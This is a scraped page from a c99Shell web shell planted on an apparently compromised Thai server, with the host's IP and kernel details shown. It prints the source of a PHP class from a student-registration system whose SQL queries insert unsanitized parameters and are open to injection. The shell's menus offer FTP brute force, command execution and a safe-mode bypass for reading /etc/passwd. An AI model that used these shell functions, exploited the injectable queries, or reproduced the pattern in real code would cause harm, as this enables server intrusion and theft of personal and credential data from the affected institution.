110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/eregis/class/ drwxr-xr-x Free 50.65 GB of 127.8 GB (39.63%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

//--Class Officer--------------------------



include_once "clsbase_Officer.php";



class Officer extends base_Officer{



function RSOfficerLimit($start, $pageSize){

    $this->SetQuery("select * from Officer order by officerName limit $start, $pageSize");

}



function SearchByOfficerCode($xKey){

    if ($this->SetQuery("select * from rg_Person where prsUsId='$xKey'")){

        return 1;

    }else {

        return 0;

    }

}



function RSOfficerByOfCodeAndNmAndSn($xKey, $yKey, $zKey){

    $this->SetQuery("select * from Officer where officerCode like '%$xKey%' and officerName like '%$yKey%' and officerSurname like '%$zKey%' order by officerName");

}



function SearchByOfCodeOfNOfSn($OfC, $OfN, $OfSn){

    $this->SetQuery("select * from Officer where officerCode='$OfC' or officerName='$OfN' or officerSurname='$OfSn'");

}



function RSOfficerByOgIdAndDebtUDAuthorityIsY($xKey){

    $this->SetQuery("select * from Officer where organId='$xKey' and debtUDAuthority='Y'");

}



// ***** Start TIMETABLE *****

function RSOfficerOrderNmAndSn(){

    $this->SetQuery("select * from ".$GLOBALS["PPC_DBNAME"].".Person, ".$GLOBALS["EREGIS_DBNAME"].".rg_Person, ".$GLOBALS["EREGIS_DBNAME"].".rg_FStatusInPs where fipPsId=1 and fipFStatus=fStatus and personId=prsUsId order by fName, lName");

}

// ***** End TIMETABLE *****



function RSOfficerOrderNmAndSnLimit($start, $pageSize){

    $this->SetQuery("select * from Officer where officerStatus=1 order by officerName, officerSurname 

                        limit $start, $pageSize");

}



    function qryPrsJoinRG($prsId) {

        $sql = "SELECT * FROM (

                        SELECT prs.*, 

                            '' AS psoutId, 

                            ps.personId AS personId, 

                            ps.personCode AS personCode, 

                            pf.prefixName AS prefixName, 

                            ps.fName AS fName, 

                            ps.lName AS lName 

                            FROM ".$GLOBALS["PPC_DBNAME"].".Person ps 

                            INNER JOIN ".$GLOBALS["PPC_DBNAME"].".Prefix pf ON ps.prefixId = pf.prefixId 

                            LEFT JOIN ".$GLOBALS["EREGIS_DBNAME"].".rg_Person prs ON ps.personId = prsUsId 

                            WHERE prsItId = 1 

                        UNION 

                        SELECT prs.*, 

                            pso.psoutId AS psoutId, 

                            '' AS personId, 

                            '' AS personCode, 

                            pfo.prefixName AS prefixName, 

                            pso.fName AS fName, 

                            pso.lName AS lName 

                            FROM ".$GLOBALS["PPC_DBNAME"].".Personout pso 

                            INNER JOIN ".$GLOBALS["PPC_DBNAME"].".Prefix pfo ON pso.prefixId = pfo.prefixId 

                            LEFT JOIN ".$GLOBALS["EREGIS_DBNAME"].".rg_Person prs ON pso.psoutId = prsUsId 

                            WHERE prsItId = 2 

                    ) AS tb 

                    WHERE prsId ='$prsId' ";

        $this->SetQuery($sql);

    }



} //--End class Officer--

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: